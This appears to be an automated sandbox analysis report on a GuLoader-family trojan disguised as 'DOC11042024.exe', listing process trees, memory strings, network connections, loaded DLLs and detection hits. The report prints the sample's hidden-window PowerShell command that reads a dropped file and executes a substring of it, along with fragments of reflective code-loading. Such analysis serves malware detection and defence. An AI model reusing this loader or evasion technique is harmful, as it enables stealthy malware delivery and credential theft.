          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021C5E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.69
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.69$
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBjq
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49901 version: TLS 1.2
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405295

          System Summary

          barindex
          Powershell drops PE file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exeJump to dropped file
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040331C
          Source: C:\Users\user\Desktop\DOC11042024.exeFile created: C:\Windows\resources\0809Jump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_00404AD20_2_00404AD2
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_004064F70_2_004064F7
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0671DE582_2_0671DE58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005BE9885_2_005BE988
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B53625_2_005B5362
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B71185_2_005B7118
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B9E765_2_005B9E76
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24979C705_2_24979C70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497FC685_2_2497FC68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_249729685_2_24972968
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24971E805_2_24971E80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_249717A05_2_249717A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24970B305_2_24970B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_249793285_2_24979328
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497CCA05_2_2497CCA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497D0F85_2_2497D0F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497F8105_2_2497F810
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_249750185_2_24975018
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_249700305_2_24970030
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_249750285_2_24975028
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24979C5F5_2_24979C5F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_249700405_2_24970040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497D9A75_2_2497D9A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497D9A85_2_2497D9A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497DDFF5_2_2497DDFF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497D5505_2_2497D550
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497295A5_2_2497295A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_249795485_2_24979548
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497E6B05_2_2497E6B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497E6AF5_2_2497E6AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497DE005_2_2497DE00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497E2575_2_2497E257
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497E2585_2_2497E258
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24971E705_2_24971E70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24978B915_2_24978B91
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497178F5_2_2497178F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497F3B85_2_2497F3B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24978BA05_2_24978BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497EB085_2_2497EB08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24970B205_2_24970B20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2497EF605_2_2497EF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24B496585_2_24B49658
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24B41A205_2_24B41A20
          Source: DOC11042024.exeStatic PE information: invalid certificate
          Source: DOC11042024.exe, 00000000.00000000.2019207241.000000000046D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehomomorphous enterokinesia.exe, vs DOC11042024.exe
          Source: DOC11042024.exeBinary or memory string: OriginalFilenamehomomorphous enterokinesia.exe, vs DOC11042024.exe
          Source: DOC11042024.exe.2.drBinary or memory string: OriginalFilenamehomomorphous enterokinesia.exe, vs DOC11042024.exe
          Source: DOC11042024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/15@4/4
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040458C
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
          Source: C:\Users\user\Desktop\DOC11042024.exeFile created: C:\Users\user\AppData\Roaming\turkeyismJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
          Source: C:\Users\user\Desktop\DOC11042024.exeFile created: C:\Users\user\AppData\Local\Temp\nspE74F.tmpJump to behavior
          Source: DOC11042024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\DOC11042024.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021EC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: DOC11042024.exeVirustotal: Detection: 19%
          Source: C:\Users\user\Desktop\DOC11042024.exeFile read: C:\Users\user\Desktop\DOC11042024.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DOC11042024.exe "C:\Users\user\Desktop\DOC11042024.exe"
          Source: C:\Users\user\Desktop\DOC11042024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) "
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\DOC11042024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) "Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\bestialitet.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2324502580.0000000002A48000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdbic source: powershell.exe, 00000002.00000002.2344628886.00000000082EE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5) source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000002.00000002.2345390385.000000000A530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unbadgering $ravnemrketlantpagten $Yemenittiskes), (Radikalest88 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Blomstringstiderne = [AppDomain]::CurrentD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Antiexpansionist)), $ravnemrkefgifterne).DefineDynamicModule($antologiens, $false).DefineType($helsider, $Dewanee, [System.MulticastDe
          Suspicious powershell command line found
          Source: C:\Users\user\Desktop\DOC11042024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) "
          Source: C:\Users\user\Desktop\DOC11042024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) "Jump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0671CA78 push eax; mov dword ptr [esp], edx2_2_0671CA8C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0671CA86 push eax; mov dword ptr [esp], edx2_2_0671CA8C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_067110B8 push eax; ret 2_2_067110D2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06711148 push eax; ret 2_2_06711152
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06711138 push eax; ret 2_2_06711142
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06711128 push eax; ret 2_2_06711132
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06711118 push eax; ret 2_2_06711122
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_090131A1 push 3B63085Eh; ret 2_2_090131AD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_090139E9 push 8BD68B50h; retf 2_2_090139F4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09010209 push 8BD68B50h; iretd 2_2_0901020E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09013549 push 8BD38B50h; iretd 2_2_0901354E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09040106 push ebp; retf 2_2_09040107
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0904972F push eax; ret 2_2_09049737
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09049740 pushfd ; retf 2_2_09049742
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0904A3E6 push eax; retf 2_2_0904A3E7
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_090479F2 push edx; ret 2_2_090479F3
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0904445E push 56A2C6ABh; ret 2_2_09044463
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_090460A1 push ebp; ret 2_2_090460A2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_090402AC push ebx; ret 2_2_090402B3
